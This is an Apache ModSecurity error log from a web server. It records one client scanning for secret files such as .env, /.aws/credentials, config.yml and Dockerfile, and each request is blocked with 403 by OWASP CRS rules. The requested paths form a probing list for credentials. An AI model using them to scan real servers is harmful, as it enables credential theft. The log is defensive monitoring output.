[Sat Nov 29 10:52:05.318177 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aSrCRXHF7XN8-DkqegVy6QAAAAQ"]
[Sat Nov 29 10:52:05.318512 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aSrCRXHF7XN8-DkqegVy6QAAAAQ"]
[Sat Nov 29 10:52:05.318817 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aSrCRXHF7XN8-DkqegVy6QAAAAQ"]
[Sat Nov 29 10:52:05.896545 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/exapi/.env"] [unique_id "aSrCRRuHESEEqrci5wSNlwAAAAw"]
[Sat Nov 29 10:52:05.896760 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/exapi/.env"] [unique_id "aSrCRRuHESEEqrci5wSNlwAAAAw"]
[Sat Nov 29 10:52:05.896962 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/exapi/.env"] [unique_id "aSrCRRuHESEEqrci5wSNlwAAAAw"]
[Sat Nov 29 10:52:06.152166 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aSrCRnHF7XN8-DkqegVy6gAAAAQ"]
[Sat Nov 29 10:52:06.152476 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aSrCRnHF7XN8-DkqegVy6gAAAAQ"]
[Sat Nov 29 10:52:06.152720 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aSrCRnHF7XN8-DkqegVy6gAAAAQ"]
[Sat Nov 29 10:52:06.545492 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aSrCRhuHESEEqrci5wSNmAAAAAw"]
[Sat Nov 29 10:52:06.545492 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/en/.env"] [unique_id "aSrCRnHF7XN8-DkqegVy6wAAAAQ"]
[Sat Nov 29 10:52:06.545805 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/en/.env"] [unique_id "aSrCRnHF7XN8-DkqegVy6wAAAAQ"]
[Sat Nov 29 10:52:06.545805 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aSrCRhuHESEEqrci5wSNmAAAAAw"]
[Sat Nov 29 10:52:06.546074 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/en/.env"] [unique_id "aSrCRnHF7XN8-DkqegVy6wAAAAQ"]
[Sat Nov 29 10:52:06.546074 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aSrCRhuHESEEqrci5wSNmAAAAAw"]
[Sat Nov 29 10:52:07.006355 2025] [:error] [pid 406029] [client 3.8.164.39:36450] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/v1/.env"] [unique_id "aSrCR1w-ljF8z8u_ETMg8QAAAA0"]
[Sat Nov 29 10:52:07.006579 2025] [:error] [pid 406029] [client 3.8.164.39:36450] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/v1/.env"] [unique_id "aSrCR1w-ljF8z8u_ETMg8QAAAA0"]
[Sat Nov 29 10:52:07.006773 2025] [:error] [pid 406029] [client 3.8.164.39:36450] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/v1/.env"] [unique_id "aSrCR1w-ljF8z8u_ETMg8QAAAA0"]
[Sat Nov 29 10:52:07.248925 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/administrator/.env"] [unique_id "aSrCR3HF7XN8-DkqegVy7AAAAAQ"]
[Sat Nov 29 10:52:07.249250 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/administrator/.env"] [unique_id "aSrCR3HF7XN8-DkqegVy7AAAAAQ"]
[Sat Nov 29 10:52:07.249490 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/administrator/.env"] [unique_id "aSrCR3HF7XN8-DkqegVy7AAAAAQ"]
[Sat Nov 29 10:52:07.558982 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aSrCRxuHESEEqrci5wSNmQAAAAw"]
[Sat Nov 29 10:52:07.559264 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aSrCRxuHESEEqrci5wSNmQAAAAw"]
[Sat Nov 29 10:52:07.559499 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aSrCRxuHESEEqrci5wSNmQAAAAw"]
[Sat Nov 29 10:52:08.524483 2025] [:error] [pid 406029] [client 3.8.164.39:36450] [client 3.8.164.39] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/app.config"] [unique_id "aSrCSFw-ljF8z8u_ETMg8gAAAA0"]
[Sat Nov 29 10:52:08.524858 2025] [:error] [pid 406029] [client 3.8.164.39:36450] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/app.config"] [unique_id "aSrCSFw-ljF8z8u_ETMg8gAAAA0"]
[Sat Nov 29 10:52:08.525056 2025] [:error] [pid 406029] [client 3.8.164.39:36450] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/app.config"] [unique_id "aSrCSFw-ljF8z8u_ETMg8gAAAA0"]
[Sat Nov 29 10:52:09.064216 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.config"] [unique_id "aSrCSXHF7XN8-DkqegVy7gAAAAQ"]
[Sat Nov 29 10:52:09.064553 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.config"] [unique_id "aSrCSXHF7XN8-DkqegVy7gAAAAQ"]
[Sat Nov 29 10:52:09.064793 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.config"] [unique_id "aSrCSXHF7XN8-DkqegVy7gAAAAQ"]
[Sat Nov 29 10:52:09.571491 2025] [:error] [pid 406029] [client 3.8.164.39:36450] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/config/config.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/config.yml found within REQUEST_FILENAME: /config/config.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/config.yml"] [unique_id "aSrCSVw-ljF8z8u_ETMg8wAAAA0"]
[Sat Nov 29 10:52:09.571721 2025] [:error] [pid 406029] [client 3.8.164.39:36450] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/config.yml"] [unique_id "aSrCSVw-ljF8z8u_ETMg8wAAAA0"]
[Sat Nov 29 10:52:09.571913 2025] [:error] [pid 406029] [client 3.8.164.39:36450] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/config.yml"] [unique_id "aSrCSVw-ljF8z8u_ETMg8wAAAA0"]
[Sat Nov 29 10:52:10.215084 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aSrCShuHESEEqrci5wSNnQAAAAw"]
[Sat Nov 29 10:52:10.215276 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aSrCShuHESEEqrci5wSNnQAAAAw"]
[Sat Nov 29 10:52:10.215448 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aSrCShuHESEEqrci5wSNnQAAAAw"]
[Sat Nov 29 10:52:13.526056 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "Dockerfile" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: Dockerfile found within REQUEST_FILENAME: /dockerfile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/Dockerfile"] [unique_id "aSrCTXHF7XN8-DkqegVy9AAAAAQ"]
[Sat Nov 29 10:52:13.526288 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/Dockerfile"] [unique_id "aSrCTXHF7XN8-DkqegVy9AAAAAQ"]
[Sat Nov 29 10:52:13.526526 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/Dockerfile"] [unique_id "aSrCTXHF7XN8-DkqegVy9AAAAAQ"]
